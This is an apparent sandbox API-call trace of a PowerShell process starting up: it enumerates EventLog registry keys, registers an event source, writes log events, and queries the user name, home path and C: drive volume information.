[0080.706] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x358) returned 0x0
[0080.706] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.707] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x35c) returned 0x0
[0080.707] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.707] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x360) returned 0x0
[0080.707] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.707] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x364) returned 0x0
[0080.707] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.707] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x368) returned 0x0
[0080.707] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.707] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x5
[0080.710] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x36c) returned 0x0
[0080.710] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.710] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x370) returned 0x0
[0080.710] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x374) returned 0x0
[0080.710] RegCloseKey (hKey=0x374) returned 0x0
[0080.711] RegCloseKey (hKey=0x350) returned 0x0
[0080.711] RegCloseKey (hKey=0x370) returned 0x0
[0080.711] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf48 | out: phkResult=0xccf48*=0x370) returned 0x0
[0080.711] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccebc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcceb8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccebc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcceb8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.711] CoTaskMemFree (pv=0x0)
[0080.711] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.711] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.711] CoTaskMemFree (pv=0x321480)
[0080.711] CoTaskMemFree (pv=0x0)
[0080.711] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.711] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.711] CoTaskMemFree (pv=0x321480)
[0080.711] CoTaskMemFree (pv=0x0)
[0080.711] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.711] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.711] CoTaskMemFree (pv=0x321480)
[0080.711] CoTaskMemFree (pv=0x0)
[0080.711] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.711] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.712] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.712] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.712] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.712] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.712] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x321480, lpcchName=0xccf48, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf48, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.712] CoTaskMemFree (pv=0x321480)
[0080.712] CoTaskMemFree (pv=0x0)
[0080.712] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x350) returned 0x0
[0080.712] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.712] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x374) returned 0x0
[0080.712] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.712] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x378) returned 0x0
[0080.712] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.712] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x37c) returned 0x0
[0080.712] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.713] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x380) returned 0x0
[0080.713] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.713] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x384) returned 0x0
[0080.713] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.713] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x5
[0080.720] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x388) returned 0x0
[0080.720] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x0) returned 0x2
[0080.720] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x38c) returned 0x0
[0080.753] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x390) returned 0x0
[0080.753] RegCloseKey (hKey=0x390) returned 0x0
[0080.753] RegCloseKey (hKey=0x370) returned 0x0
[0080.754] RegCloseKey (hKey=0x38c) returned 0x0
[0080.755] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf18 | out: phkResult=0xccf18*=0x38c) returned 0x0
[0080.755] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.755] CoTaskMemFree (pv=0x321480)
[0080.755] CoTaskMemFree (pv=0x0)
[0080.755] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.755] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x321480, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.756] CoTaskMemFree (pv=0x321480)
[0080.756] CoTaskMemFree (pv=0x0)
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x370) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x390) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x394) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x398) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x39c) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x3a0) returned 0x0
[0080.756] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.756] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x5
[0080.760] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x3a4) returned 0x0
[0080.760] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x0) returned 0x2
[0080.760] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x3a8) returned 0x0
[0080.760] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf78 | out: phkResult=0xccf78*=0x3ac) returned 0x0
[0080.760] RegCloseKey (hKey=0x3ac) returned 0x0
[0080.760] RegCloseKey (hKey=0x38c) returned 0x0
[0080.761] RegCloseKey (hKey=0x3a8) returned 0x0
[0080.774] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
[0080.778] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c0d2a8*="WSMan", lpRawData=0x3c0d018) returned 1
[0080.784] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.784] CoTaskMemFree (pv=0x2c7570)
[0080.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.786] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.786] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.788] CoTaskMemFree (pv=0x1b826f50)
[0080.788] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.788] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.788] CoTaskMemFree (pv=0x321480)
[0080.788] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c12790*="Alias", lpRawData=0x3c12520) returned 1
[0080.792] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.792] CoTaskMemFree (pv=0x2c7570)
[0080.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.793] CoTaskMemAlloc (cb=0x804) returned 0x1b826f50
[0080.793] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b826f50, nSize=0xcd208 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xcd208) returned 0x1
[0080.793] CoTaskMemFree (pv=0x1b826f50)
[0080.793] CoTaskMemAlloc (cb=0x204) returned 0x321480
[0080.793] GetUserNameW (in: lpBuffer=0x321480, pcbBuffer=0xcd248 | out: lpBuffer="aETAdzjz", pcbBuffer=0xcd248) returned 1
[0080.794] CoTaskMemFree (pv=0x321480)
[0080.794] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c17d38*="Environment", lpRawData=0x3c17ac8) returned 1
[0080.800] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.800] CoTaskMemFree (pv=0x2c7570)
[0080.800] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.800] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0080.800] CoTaskMemFree (pv=0x2c7570)
[0080.800] CoTaskMemAlloc (cb=0x104) returned 0x2c7570
[0080.800] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2c7570, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0080.800] CoTaskMemFree (pv=0x2c7570)
[0080.800] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0xccdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0080.800] SetErrorMode (uMode=0x1) returned 0x1
[0080.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0xccfc0 | out: lpFileInformation=0xccfc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0080.801] SetErrorMode (uMode=0x1) returned 0x1
[0080.822] GetLogicalDrives () returned 0x4
[0080.825] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.826] SetErrorMode (uMode=0x1) returned 0x1
[0080.826] CoTaskMemAlloc (cb=0x68) returned 0x301f90
[0080.826] CoTaskMemAlloc (cb=0x68) returned 0x302000
[0080.827] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x301f90, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xccf90, lpMaximumComponentLength=0xccf8c, lpFileSystemFlags=0xccf88, lpFileSystemNameBuffer=0x302000, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xccf90*=0x705ba84c, lpMaximumComponentLength=0xccf8c*=0xff, lpFileSystemFlags=0xccf88*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
[0080.827] CoTaskMemFree (pv=0x301f90)
[0080.827] CoTaskMemFree (pv=0x302000)
[0080.827] SetErrorMode (uMode=0x1) returned 0x1
[0080.827] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0080.828] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
[0080.828] SetErrorMode (uMode=0x1) returned 0x1
